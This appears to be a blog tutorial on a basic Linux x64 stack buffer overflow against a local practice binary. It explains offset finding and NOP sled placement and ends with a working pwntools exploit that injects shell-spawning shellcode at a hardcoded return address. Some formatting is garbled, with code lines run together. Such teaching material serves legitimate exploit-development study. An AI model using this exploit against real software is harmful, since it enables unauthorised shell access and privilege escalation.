Linux x64 Basic Stack Overflow
Hey squad,
Hey squad,
Let’s do some basic Linux x64 buffer overflow today. I would like to do it step-by-step.
starttttttt!
Overflow the Buffer
First, we need to check what protections we have,
we will create a pattern and try to find to find the buffer length.
we observe in the above output that the RIP does not show any of the patter. This could be due to the memory allocation to the process. We can predict the buffer size using RBP as well.
So, the size will be RBP + 8
Looking at the memory map it can be observed, that most of the addresses are 6-bytes and not 8. This is the cause for our issue.
There is a vsyscall memory area which is shared with the kernel and is used by the operating system. This is the only fully 8-byte wide address. Apart from it, no such addresses are mapped by the application memory.
python -c ‘print “A”*160 + “B”*8 + “C”*6’ > rip.txt
Let’s reduce the number of “C”s to 6 and relaunch the binary within gdb.
Deploy the shell code
We have a buffer size of 168, so we can easily put our shell code infront of the payload as it will be only around 40–60 bytes.
payload = [NOP] + [shell_code] + buffer of A’s + [RIP]
we need to find the address where we want to jump. For that, we can give a payload of 40 NOPs and 128 A’s. Then, find the location of where NOPs is.
For this purpose, we need to copy the binary and create a new one without SUID bit as this will generate core dump.
so, we can jump to 0x7fffffffe338
Final exploit:from pwn import *io = process(‘./vuln’)context.clear(arch='amd64')nop = b’\x90' * 40
shell = asm(shellcraft.sh())
buffer = b’A’*(167-len(shell)-len(nop))+b’B’
RIP = p64(0x7fffffffe338)payload = nop + shell + buffer + RIP
print(len(payload), len(nop), len(shell), len(buffer), len(RIP))io.recvline()
io.recvline()
io.sendline(payload)io.interactive()
Please give a clap if you found it to be useful and follow me to get more hacking knowledge.